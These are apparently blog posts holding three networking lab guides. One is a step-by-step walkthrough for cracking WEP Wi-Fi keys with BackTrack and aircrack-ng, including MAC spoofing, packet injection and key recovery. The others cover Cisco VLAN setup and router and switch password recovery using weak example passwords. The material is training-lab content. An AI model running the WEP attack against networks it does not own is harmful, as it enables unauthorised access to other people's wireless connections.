Saturday, January 3, 2009

Lab4 Crack WEP using Blacktrack3.0 live CD

Lab Section:  Wireless Security

Lab Title: Crack WEP using Blacktrack3.0 live CD



1.       Understand how WEP works.

2.       Understand the method of cracking WEP

3.       Warning: It is illegal to crack other peoples’ wireless connection without their permission. this tutorial is for educational purposes only



1.       Check if your wireless card is supported by Blacktrack:

2.       Detect, sniff, inject wireless network

3.       Always can use “man [command]” to get the description of the command.



1.       airmon-ng: change the wireless card into monitor mode.

2.       ifconfig: configure a card

3.       iwconfig: configure a wireless card

4.       macchanger: change the mac address of a networking card

5.       airodump-ng: capture packets

6.       aireplay-ng: generate traffic by injecting ARP-request packets into a wireless network.

7.       commview for wifi: (optional) generate traffic.




1. Get the target AP’s information (BSSID, ESSID, channel etc.)

Open a terminal window.

# cd /tmp

# iwconfig                          

-- Show and get the wireless device name.

# airodump-ng [device]        

-- Once you get the information, press crtl+c to stop the capture, then copy and paste the target AP’s information to a notepad.


2. Change the wireless card’s MAC address

# macchanger –s rausb0

       -- Show the wireless card’s MAC address

# airmon-ng stop [device]

       -- turn wireless card into manage mode.

# ifconfig [device] down

       -- Turn off the wireless card; otherwise you can not change the MAC address.


# macchanger –a rausb0

-- Change the MAC of the wireless card to a faked MAC. An attacker always wants to hide himself. This is a necessary step for attack purpose.

# ifconfig [device] up

       -- Turn on the wireless card.


3. Change the wireless card into monitor mode

# airmon-ng start [device]

       -- Enable the monitor mode

# iwconfig

       -- Make sure the wireless card is in the Monitor mode.


4. Capture packets:

# airodump-ng –c [channel] –w [file name] –-bssid [AP’s bssid] --ivs [device]

-- To understand the parameter’s meaning, type “airodump --help” or “man airodump”. Leave this window opened


5. Associate the wireless card with the target AP:

Open a new terminal window

# aireplay-ng -1 0 -e [essid] -a [bssid] -h [wireless card’s MAC] [device]

  -- To understand the parameter’s meaning, type “aireplay --help” or “man aireplay”.


6. Generate traffics:

# aireplay-ng -3 –b [bssid] –h [wireless card’s MAC address] [device]

  -- To understand the parameter’s meaning, type “aireplay --help” or “man aireplay”. Leave this window opened. Additionally, you can use commview for wifi to generate traffics to increase the crack process.


7. Crack the password:

Open a new terminal window

# cd /tmp

# aircrack-ng –b [bssid] *.ivs



1.       For more information, please visit my blog

2.       Video demo is located in


Sunday, December 28, 2008

Lab 3 VLAN Configuration

Lab Section: Router and Switch

Lab Title: VLAN Configuration


1. Understand how to setup VLAN.


1. Basic command of switch: enable, config terminal, hostname, banner, exit, end, show, no, etc.

2. 3 ways to create VLAN: Privileged EXEC mode (vlan database); Global Configuration Mode (vlan vlanid); Interface Configuration Mode (config-if)



1. Technical Support Team: Vlan name is Tech, Vlanid=100, Description: For Technical Support team

2. Accountant Department: Vlan name is Account, Vlanid=200, Description: For Accountant department

3. Customer Service Department: Vlan name is Customer, Vlanid=300, Description: For Customer Service Department


1. Setup hostname, banner and password:


Switch#conf t

Switch(config)#hostname SW1

SW1(config)#banner motd $

Enter TEXT message. End with the character '$'.

Welcome to Valute IT Virtual Lab$

SW1(config)#enable password cisco

SW1(config)#enable secret cisco12345


2. Create vlan in Privileged EXEC mode

SW1#vlan database

SW1(vlan)#vlan 100 name Tech


SW1#show vlan

3. Create vlan in Global configuration mode:

SW1#conf t

SW1(config)#vlan 200

SW1(config-vlan)#name Account


SW1#show vlan

4. Create vlan in Interface configuration mode:

SW1#conf t

SW1(config)#interface f0/3

SW1(config-if)#switchport mode access

SW1(config-if)#switchport access vlan 300

% Access VLAN does not exist. Creating vlan 300

SW1(config-if)#no shutdown


SW1#show vlan

5. Setup the vlan description:

SW1#conf t

SW1(config)#interface vlan 100

SW1(config-if)#description ?

SW1(config-if)#description For Technical Support team

SW1(config-if)#no shutdown


SW1(config)#interface vlan 200

SW1(config-if)#description For Accountant department

SW1(config-if)#no shutdown


SW1(config)#interface vlan 300

SW1(config-if)#description For Customer Service Department


6. Change vlan name:

SW1(config)#vlan 300

SW1(config-vlan)#name Customer


SW1#show vlan

7. Assign switch port to vlan:

SW1#conf t

SW1(config)#interface fastEthernet 0/1

SW1(config-if)#switchport mode access

SW1(config-if)#switchport access vlan 100

SW1(config-if)#no shutdown


SW1(config)#interface fastEthernet 0/2

SW1(config-if)#switchport mode access

SW1(config-if)#switchport access vlan 200

SW1(config-if)#no shutdown


8. Setup trunk port, this port is used to connect to other switch

SW1(config)#interface f0/24

SW1(config-if)#switchport mode trunk

SW1(config-if)#no shutdown


SW1#show running-config

9. Do the exactly same steps with Switch 2 (except hostname).

10. Setup the PCs’ IP address (refer to the topologic graph above).

11. Use “ping” to verify the isolation.



1. For more information, please visit my blog

2. Video demo is located in

Lab 2 Reset Password of Router and Switch

Lab Section:  Router and Switch

Lab Title: Reset Password



1.       Understand how to reset the password of Cisco Router.

2.       Understand how to reset the password of Cisco Switch.



1.       Usually the switch and the router were given very complex passwords, and we forgot password for many reasons, but the start-config can not be deleted, in this situation, we need to reset the password and keep the start-config.

2.       The method of reset password for Cisco 2600 serial and 3600 serial is the same. There is a little different between 2500 and 2600/3600.

3.       For Switch, we need to get into “switch:” mode to reset the password: when you restart the switch, press “mode” key (located on the front panel of switch)





Reset 2600 serial router password (same as 3600 serial)

1.       Power on the router, in the meantime, press ctrl+break.

2.       rommon>confreg 0x2142

-- Change the start register value to 2142, it means the router will load the factory default configuration in the next start-up.

3.       rommon>reset

-- restart the router

4.       router#copy startup-config running-config:

-- Now we can enter the Privileged EXEC Mode, we need to copy the old startup-config which was saved in NVRAM to the current running config, remember we don’t want to lose the old configuration except the password.

5.       router#config t

6.       router(config)# enable password cisco.

-- After we copy the old startup-config, we also copy the old password, so we need to change it to a new password.

7.       router(config)#exit

8.       router#copy running-config startup-config

-- Save the current running-config which contains the new password to NVRAM

9.       router#conf t

10.   router(config)#config-register 0x2102

-- Restore the register value to 2102, it means router will load the configuration from NVRAM.

11.   router(config)#exit

12.   router#reload

-- Restart the router to check the password



Reset 2500 serial router Password:

1.       Power on the router, in the meaning, press ctrl+break.

2.       rommon>o/r 0x2142

-- Change the start register value to 2142, it means the router will load the factory default configuration in the next start-up.

3.       rommon>i

-- restart the router

The rest steps are as same as the 2600 router.



Reset Catalyst 2900 serial Switch password:

1.       Turn on the switch, in the mean time, press the “mode” button that located on the front panel.

2.       In the “switch:” mode, backup and rename the startup configuration.

3.       switch: dir flash:      ;check the current files in the flash, backup them if necessary.

4.       switch: rename flash:config.text flash:config_old.txt            ;Rename the configuration file, switch will use factory default setting if this file missing.

5.       switch: reset          ;Restart the switch

6.       Would you like to enter the initial configuration dialog? [yes/no]: n

7.       Enter the privilege EXEC mode

8.       Switch# copy config_old.txt running-config                ;copy the old configuration settings to running config, then we wouldn't lose the old settings.

9.       Switch# conf t

10.   Switch(config)#enable password cisco                ;Setup a new password

11.   Switch(config)#enable secret cisco12345

12.   Switch(config)#exit

13.   Switch#wirte                                      ;Save the new password to the start-up config

14.   Switch# reload               ;Restart the switch



1.       For more information, please visit my blog

2.       Video demo is located in